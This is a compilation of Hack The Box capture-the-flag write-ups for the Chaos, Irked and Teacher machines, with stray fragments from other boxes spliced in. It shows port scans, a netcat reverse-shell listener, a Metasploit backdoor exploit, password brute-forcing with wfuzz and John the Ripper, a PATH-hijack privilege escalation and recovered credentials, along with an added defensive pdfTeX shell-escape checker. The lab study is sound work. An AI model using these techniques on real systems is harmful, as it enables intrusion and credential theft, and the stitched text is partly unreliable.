Hack The Box is a website that hosts a number of vulnerable machines in its own VPN.
This is a write-up of the machine “Chaos” on that website.
Solution
1. Initial Enumeration
Port Scanning:
root@kali:~# nmap -p- 10.10.10.120 -sV -sC
Starting Nmap 7.70 ( https://nmap.org ) at 2019-06-05 10:19 EEST
Nmap scan report for chaos (10.10.10.120)
Host is up (0.035s latency).
Not shown: 65529 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.34 ((Ubuntu))
|_http-server-header: Apache/2.4.34 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
110/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: RESP-CODES PIPELINING AUTH-RESP-CODE STLS SASL CAPA UIDL TOP
| ssl-cert: Subject: commonName=chaos
| Subject Alternative Name: DNS:chaos
| Not valid before: 2018-10-28T10:01:49
|_Not valid after: 2028-10-25T10:01:49
|_ssl-date: TLS randomness does not represent time
143/tcp open imap Dovecot imapd (Ubuntu)
|_imap-capabilities: ENABLE have more SASL-IR post-login LITERAL+ listed capabilities IDLE ID LOGIN-REFERRALS IMAP4rev1 Pre-login STARTTLS OK LOGINDISABLEDA0001
| ssl-cert: Subject: commonName=chaos
| Subject Alternative Name: DNS:chaos
| Not valid before: 2018-10-28T10:01:49
|_Not valid after: 2028-10-25T10:01:49
|_ssl-date: TLS randomness does not represent time
993/tcp open ssl/imap Dovecot imapd (Ubuntu)
|_imap-capabilities: ENABLE have SASL-IR more LITERAL+ post-login listed IDLE ID AUTH=PLAINA0001 IMAP4rev1 capabilities Pre-login OK LOGIN-REFERRALS
| ssl-cert: Subject: commonName=chaos
| Subject Alternative Name: DNS:chaos
| Not valid before: 2018-10-28T10:01:49
|_Not valid after: 2028-10-25T10:01:49
|_ssl-date: TLS randomness does not represent time
995/tcp open ssl/pop3 Dovecot pop3d
|_pop3-capabilities: RESP-CODES PIPELINING USER AUTH-RESP-CODE SASL(PLAIN) CAPA UIDL TOP
| ssl-cert: Subject: commonName=chaos
| Subject Alternative Name: DNS:chaos
| Not valid before: 2018-10-28T10:01:49
|_Not valid after: 2028-10-25T10:01:49
|_ssl-date: TLS randomness does not represent time
10000/tcp open http MiniServ 1.890 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html;Charset=iso-8859-1).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 65.86 seconds
This looks like a Python script that encrypts a given message.
We can find this code in this repository, which also contains a script to decrypt the message.
With the following commands, we can decrypt the encrypted message.
root@kali:~# cat enim_msg.txt
MDAwMDAwMDAwMDAwMDIzNK7uqnoZitizcEs4hVpDg8z18LmJXjnkr2tXhw/AldQmd/g53L6pgva9RdPkJ3GSW57onvseOe5ai95/M4APq+3mLp4GQ5YTuRTaGsHtrMs7rNgzwfiVor7zNryPn1Jgbn8M7Y2mM6I+lH0zQb6Xt/JkhOZGWQzH4llEbyHvvlIjfu+MW5XrOI6QAeXGYTTinYSutsOhPilLnk1e6Hq7AUnTxcMsqqLdqEL5+/px3ZVZccuPUvuSmXHGE023358ud9XKokbNQG3LOQuRFkpE/LS10yge+l6ON4g1fpYizywI3+h9l5Iwpj/UVb0BcVgojtlyz5gIv12tAHf7kpZ6R08=
root@kali:~# cat enim_msg.txt | base64 -d > bin.hacklab
root@kali:~# python Python-Scripts/crypto.py -d bin.hacklab -p sahay
|
|
-----+------ -----------
|
|
)(\ \ / /
\ |\ / |/
\|\ hack1lab / /
\ |\ -------- / | /
\ | \_______________________/ | /
\ | | | | | |/
\| | | | | /
\____|______|______|______|___/
By: @hacklab, @mohamed1lar
fb.me/hack1lab, fb.me/mohamed1lar
[+] Decrypting......
[+] removing file......
[+] Done
root@kali:~# cat bin
SGlpIFNhaGF5CgpQbGVhc2UgY2hlY2sgb3VyIG5ldyBzZXJ2aWNlIHdoaWNoIGNyZWF0ZSBwZGYKCnAucyAtIEFzIHlvdSB0b2xkIG1lIHRvIGVuY3J5cHQgaW1wb3J0YW50IG1zZywgaSBkaWQgOikKCmh0dHA6Ly9jaGFvcy5odGIvSjAwX3cxbGxfZjFOZF9uMDdIMW45X0gzcjMKClRoYW5rcywKQXl1c2gK
root@kali:~# cat bin | base64 -d
Hii Sahay
Please check our new service which create pdf
p.s - As you told me to encrypt important msg, i did :)
http://chaos.htb/J00_w1ll_f1Nd_n07H1n9_H3r3
Thanks,
Ayush
It looks like there is something interesting at the address “http://chaos.htb/J00_w1ll_f1Nd_n07H1n9_H3r3”.
We have to add the following line to “/etc/hosts” for name resolution.
10.10.10.120 chaos.htb
There we find an interesting page that creates a PDF file.
Looking at the response, we can see that this page uses pdfTeX version 3.14159265-2.6-1.40.19.
The response also contains the line “\write18 enabled”.
This means we can execute shell commands by submitting a payload and pressing the “Create PDF” button.
root@kali:~# nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.10.14.3] from (UNKNOWN)[10.10.10.120] 49920
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
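As a defender's check on the pdfTeX banner line discussed above (an added example, not code from the original write-up): it classifies the shell-escape mode from the text a pdfTeX-backed service returns, and reads the shell_escape key from a texmf.cnf fragment to show the weak setting beside the corrected one. The banner and config texts are constructed samples, not captures from the box.

```python
import re

# Constructed samples of the banner pdfTeX prints at the start of every run.
# A service that echoes this back to the client (as the Chaos PDF page did) is
# advertising whether \write18 shell escape is active. Wording matches the real
# banner; the text itself is made up here.
UNRESTRICTED_BANNER = (
    "This is pdfTeX, Version 3.14159265-2.6-1.40.19 (TeX Live 2018)\n"
    " \\write18 enabled.\n"
    "entering extended mode\n"
)
RESTRICTED_BANNER = UNRESTRICTED_BANNER.replace(" \\write18", " restricted \\write18")
DISABLED_BANNER = UNRESTRICTED_BANNER.replace(" \\write18 enabled.\n", "")

def classify_banner(text):
    """Classify the shell-escape state from pdfTeX banner or log text."""
    if re.search(r"^\s*restricted \\write18 enabled\.", text, re.M):
        return "restricted"    # only the shell_escape_commands allow-list runs
    if re.search(r"^\s*\\write18 enabled\.", text, re.M):
        return "unrestricted"  # any command in \write18{...} runs as the TeX user
    return "disabled"

# The same switch lives in texmf.cnf: shell_escape = t (any command),
# p (allow-list only) or f (off). Constructed weak and corrected fragments:
WEAK_CNF = "% site overrides\nshell_escape = p\nshell_escape = t  % left on by a developer\n"
FIXED_CNF = "shell_escape = p\nshell_escape_commands = bibtex,kpsewhich,makeindex\n"

def shell_escape_mode(cnf_text):
    """Return the effective shell_escape value from texmf.cnf text, or None if unset.
    Later assignments override earlier ones; '%' starts a comment."""
    mode = None
    for line in cnf_text.splitlines():
        line = line.split("%", 1)[0].strip()
        m = re.match(r"^shell_escape\s*=\s*(\S+)$", line)
        if m:
            mode = m.group(1).lower()
    return mode

def needs_attention(banner_text, cnf_text):
    """True if the observed banner or the configuration allows arbitrary commands.
    A command line of `pdflatex -shell-escape` overrides texmf.cnf, so the banner
    (what the running process reports) is the more reliable of the two signals."""
    return classify_banner(banner_text) == "unrestricted" or shell_escape_mode(cnf_text) == "t"

if __name__ == "__main__":
    print(classify_banner(UNRESTRICTED_BANNER), shell_escape_mode(WEAK_CNF))
    print(needs_attention(RESTRICTED_BANNER, FIXED_CNF))
```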
However, the shell does not have an appropriate value in $PATH.
We have to modify it.
ayush@chaos:~$ ls
ls
Command 'ls' is available in '/bin/ls'
The command could not be located because '/bin' is not included in the PATH environment variable.
ls: command not found
ayush@chaos:~$ echo $PATH
echo $PATH
/home/ayush/.app
With the export command, we can append the standard directories to $PATH, which makes the other shell commands available.
“user.txt” is in the directory “/home/ayush”.
ayush@chaos:~$ export PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
ayush@chaos:~$ echo $PATH
/home/ayush/.app:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
ayush@chaos:~$ ls
mail user.txt
ayush@chaos:~$ cat user.txt
eef39126d9c3b4b8a30286970dc713e1
3. Getting Root
In the home directory of ayush, we have “.mozilla” directory.
ayush@chaos:~$ ls -la
total 40
drwx------ 6 ayush ayush 4096 Jun 8 06:15 .
drwxr-xr-x 4 root root 4096 Oct 28 2018 ..
drwxr-xr-x 2 root root 4096 Oct 28 2018 .app
-rw------- 1 root root 0 Nov 24 2018 .bash_history
-rw-r--r-- 1 ayush ayush 220 Oct 28 2018 .bash_logout
-rwxr-xr-x 1 root root 22 Oct 28 2018 .bashrc
drwx------ 3 ayush ayush 4096 Jun 8 06:15 .gnupg
drwx------ 3 ayush ayush 4096 Oct 28 2018 mail
drwx------ 4 ayush ayush 4096 Sep 29 2018 .mozilla
-rw-r--r-- 1 ayush ayush 807 Oct 28 2018 .profile
-rw------- 1 ayush ayush 33 Oct 28 2018 user.txt
We can find stored Firefox credentials in “logins.json” in the following directory.
With the above credential, we can log in as the root user.
ayush@chaos:~$ su root
su root
Password: Thiv8wrej~
root@chaos:/home/ayush# cd
cd
root@chaos:~# cat root.txt
cat root.txt
4eca7e09e3520e020884563cfbabbc70
Since we cannot use gobuster here, we have to enumerate the website manually.
On the top page, we can find links to the following pages.
/info.php
/status.php
/user.php
We can find interesting information on user.php.
According to this information, we can log in to this box with the following credential.
10.10.14.4:10.10.14.4
root@kali:~# ssh 10.10.14.4@10.10.10.119
The authenticity of host '10.10.10.119 (10.10.10.119)' can't be established.
ECDSA key fingerprint is SHA256:FWyyew+o9WoPYkfIKGEbTMsexks1z8ZkSUs9O+2AMSU.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '10.10.10.119' (ECDSA) to the list of known hosts.
10.10.14.4@10.10.10.119's password: # 10.10.14.4
[10.10.14.4@lightweight ~]$
After logging in, we can find a user “10.10.14.2”.
[10.10.14.4@lightweight home]$ ls -la
total 0
drwxr-xr-x. 6 root root 76 May 17 16:25 .
dr-xr-xr-x. 17 root root 224 Jun 13 2018 ..
drwx------. 4 10.10.14.2 10.10.14.2 91 Nov 16 22:39 10.10.14.2
drwx------. 4 10.10.14.4 10.10.14.4 91 May 17 17:44 10.10.14.4
drwx------. 4 ldapuser1 ldapuser1 181 Jun 15 2018 ldapuser1
drwx------. 4 ldapuser2 ldapuser2 197 Jun 21 2018 ldapuser2
To get user.txt, we have to switch users.
In the home directory of “10.10.14.2” we cannot find anything, so we have to switch to “ldapuser1” or “ldapuser2”.
Using “getcap”, we can find that we are able to sniff the network traffic.
Since this backup file is password protected, we have to crack the password.
root@kali:~# 7z x backup.7z
7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,8 CPUs Intel(R) Core(TM) i5-8250U CPU @ 1.60GHz (806EA),ASM,AES-NI)
Scanning the drive for archives:
1 file, 3411 bytes (4 KiB)
Extracting archive: backup.7z
--
Path = backup.7z
Type = 7z
Physical Size = 3411
Headers Size = 259
Method = LZMA2:12k 7zAES
Solid = +
Blocks = 1
Enter password (will not be echoed):
We can take advantage of “7z2john.pl”, which is installed on Kali Linux by default.
# install necessary module
root@kali:~# sudo apt-get install libcompress-raw-lzma-perl
# create hash for backup.7z
root@kali:/usr/share/john# ./7z2john.pl /root/backup.7z > /root/backup.7z.hash
# crack the hash with john the ripper
root@kali:~# john backup.7z.hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash(7z, 7-Zip [SHA256 256/256 AVX2 8x AES])
Cost 1 (iteration count) is 524288 for all loaded hashes
Cost 2 (padding size) is 12 for all loaded hashes
Cost 3 (compression type) is 2 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
delete (backup.7z)
1g 0:00:00:27 DONE (2019-05-17 21:52) 0.03595g/s 75.94p/s 75.94c/s 75.94C/s slimshady..morado
Use the "--show" option to display all of the cracked passwords reliably
Session completed
With the password “delete”, we can extract the data from backup.7z.
We obtain some PHP files and can find a credential in status.php.
We can use git-credential.
Since I’m using Kali, I cannot use any OS authentication procedure.
So I have to store my credentials in a local directory.
git config --global credential.helper store
We have to log in with username/password once after this command.
Then the auth data will be stored here
Hack The Box is a website that hosts a number of vulnerable machines in its own VPN.
This is a write-up of the machine “Irked” on that website.
Solution
1. Initial Enumeration
Port Scanning:
root@kali:~# nmap -p- 10.10.10.117 -sV -sC
Starting Nmap 7.70 ( https://nmap.org ) at 2018-12-29 23:55 EET
Nmap scan report for 10.10.10.117
Host is up (0.037s latency).
Not shown: 65528 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
| ssh-hostkey:
| 1024 6a:5d:f5:bd:cf:83:78:b6:75:31:9b:dc:79:c5:fd:ad (DSA)
| 2048 75:2e:66:bf:b9:3c:cc:f7:7e:84:8a:8b:f0:81:02:33 (RSA)
| 256 c8:a3:a2:5e:34:9a:c4:9b:90:53:f7:50:bf:ea:25:3b (ECDSA)
|_ 256 8d:1b:43:c7:d0:1a:4c:05:cf:82:ed:c1:01:63:a2:0c (ED25519)
80/tcp open http Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Site doesn't have a title (text/html).
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100024 1 38929/tcp status
|_ 100024 1 55964/udp status
6697/tcp open irc UnrealIRCd
8067/tcp open irc UnrealIRCd
38929/tcp open status 1 (RPC #100024)
65534/tcp open irc UnrealIRCd
Service Info: Host: irked.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 124.62 seconds
We can find a vulnerability in “UnrealIRCd” in the Exploit Database.
root@kali:~# searchsploit unrealirc
-------------------------------------------------------------------------------------------------------------------------------
Exploit Title | Path
              | (/usr/share/exploitdb/)
-------------------------------------------------------------------------------------------------------------------------------
UnrealIRCd 3.2.8.1 - Backdoor Command Execution (Metasploit) | exploits/linux/remote/16922.rb
UnrealIRCd 3.2.8.1 - Local Configuration Stack Overflow | exploits/windows/dos/18011.txt
UnrealIRCd 3.2.8.1 - Remote Downloader/Execute | exploits/linux/remote/13853.pl
UnrealIRCd 3.x - Remote Denial of Service | exploits/windows/dos/27407.pl
-------------------------------------------------------------------------------------------------------------------------------
Shellcodes: No Result
To execute the exploit, launch the Metasploit console.
msf5 > use exploit/unix/irc/unreal_ircd_3281_backdoor
msf5 exploit(unix/irc/unreal_ircd_3281_backdoor)>set rhost 10.10.10.117
rhost => 10.10.10.117
msf5 exploit(unix/irc/unreal_ircd_3281_backdoor)>set rport 6697
rport => 6697
msf5 exploit(unix/irc/unreal_ircd_3281_backdoor)> run
[*] Started reverse TCP double handler on 10.10.14.23:4444
[*] 10.10.10.117:6697 - Connected to 10.10.10.117:6697...
:irked.htb NOTICE AUTH :*** Looking up your hostname...
[*] 10.10.10.117:6697 - Sending backdoor command...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo Uccg9OJybaPvTmSP;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "Uccg9OJybaPvTmSP\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (10.10.14.23:4444 -> 10.10.10.117:51673) at 2019-04-14 17:49:40 +0300
id
uid=1001(ircd) gid=1001(ircd) groups=1001(ircd)
In the directory “/home/djmardov/Documents”, we can find user.txt and an interesting file “.backup”.
Since we are not djmardov, we do not have permission to read user.txt.
pwd
/home/djmardov/Documents
ls -la
total 16
drwxr-xr-x 2 djmardov djmardov 4096 May 15 2018 .
drwxr-xr-x 18 djmardov djmardov 4096 Nov 3 04:40 ..
-rw-r--r-- 1 djmardov djmardov 52 May 16 2018 .backup
-rw------- 1 djmardov djmardov 33 May 15 2018 user.txt
It seems the content of .backup is a password for steganography.
cat .backup
Super elite steg backup pw
UPupDOWNdownLRlrBAbaSSss
On the top page of port 80, we can find an image file “irked.jpg”.
We can use this website to extract the hidden data from irked.jpg.
The data obtained is “Kab6h+m+bbp2J:HG”.
djmardov:Kab6h+m+bbp2J:HG
We can use the credential above for an SSH connection.
root@kali:~# ssh djmardov@10.10.10.117
djmardov@10.10.10.117's password:
~~~
Last login: Tue May 15 08:56:32 2018 from 10.33.3.3
djmardov@irked:~$
Unlike other boxes, user.txt is in the directory “Documents”.
djmardov@irked:~$ /usr/bin/viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0 2019-04-11 15:02 (:0)
djmardov pts/0 2019-04-14 11:05 (10.10.14.23)
sh: 1: /tmp/listusers: not found
It seems “viewuser” expects a file “/tmp/listusers”, which the shell tries to execute.
So we put a command into “/tmp/listusers” and can confirm that it is executed.
djmardov@irked:~$ echo /bin/bash > /tmp/listusers
djmardov@irked:~$ chmod 777 /tmp/listusers
djmardov@irked:~$ /usr/bin/viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0 2019-04-23 17:05 (:0)
djmardov pts/0 2019-04-27 15:35 (10.10.14.23)
root@irked:~#
Hack The Box is a website that hosts a number of vulnerable machines in its own VPN.
This is a write-up of the machine “Teacher” on that website.
Solution
1. Initial Enumeration
Port Scanning:
root@kali:~# nmap -p- 10.10.10.153 -sV -sC
Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-15 23:12 EET
Nmap scan report for 10.10.10.153
Host is up (0.035s latency).
Not shown: 65534 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Blackhat highschool
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 73.90 seconds
As we can see, Moodle is running on this server.
We can log in to Moodle as a guest user, but there is no interesting information there.
By enumerating some other pages, we can find a strange image file on “/gallery.html”.
What we find is that:
There is an image tag whose source file exists, but the image cannot be displayed.
The tag shows an unknown message which says “That’s an F”.
By executing a curl command, we can find out the content of 5.png.
root@kali:~# curl http://10.10.10.153/images/5.png
Hi Servicedesk,
I forgot the last charachter of my password. The only part I remembered is Th4C00lTheacha.
Could you guys figure out what the last charachter is, or just reset it?
Thanks,
Giovanni
According to this information, the expected username is “Giovanni”.
Its password consists of “Th4C00lTheacha” plus one character.
We can use this information to log in to the Moodle admin console.
First, we have to create a list of possible passwords.
By running the script above, we get the candidate passwords.
Then we run a dictionary attack.
We can use “wfuzz” for this purpose.
root@kali:~# wfuzz -w ./password.txt --hh 440 -t 20 -d "anchor=&username=giovanni&password=FUZZ" http://10.10.10.153/moodle/login/index.php
Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 2.3.4 - The Web Fuzzer *
********************************************************
Target: http://10.10.10.153/moodle/login/index.php
Total requests: 94
==================================================================
ID Response Lines Word Chars Payload
==================================================================
000065: C=303 6 L 34 W 454 Ch "Th4C00lTheacha#"
Total time: 11.37637
Processed Requests: 94
Filtered Requests: 93
Requests/sec.: 8.262736
This means we have obtained the following credential for Moodle.
giovanni:Th4C00lTheacha#
Then click on Algebra, the settings button, and “More…”.
Click “Questions” and “Create a new question”.
Then click “Calculated” and “Add”.
Put in the following values, save the changes and click “Next page”.
Crack this hash with John the Ripper. The password is “expelled”.
We can use the credential “giovanni:expelled” for the su command.
As usual, user.txt is in the home directory.
www-data@teacher:/var/www/html/moodle$ su giovanni
su giovanni
Password: expelled
giovanni@teacher:/var/www/html/moodle$ cd
cd
giovanni@teacher:~$ cat user.txt
cat user.txt
fa9ae187462530e841d9e61936648fa7
3. Getting Root
If we execute the following command, we can assume from the directory's modification date that an automatic process is running and modifying this directory.
giovanni@teacher:~/work$ ls -la
ls -la
total 16
drwxr-xr-x 4 giovanni giovanni 4096 Apr 26 21:28 .
drwxr-x--- 4 giovanni giovanni 4096 Nov 4 19:47 ..
drwxrwxrwx 3 giovanni giovanni 4096 Apr 26 21:28 courses
drwxrwxrwx 3 giovanni giovanni 4096 Jun 27 2018 tmp
At the same time, we can find an interesting binary in “/usr/bin”.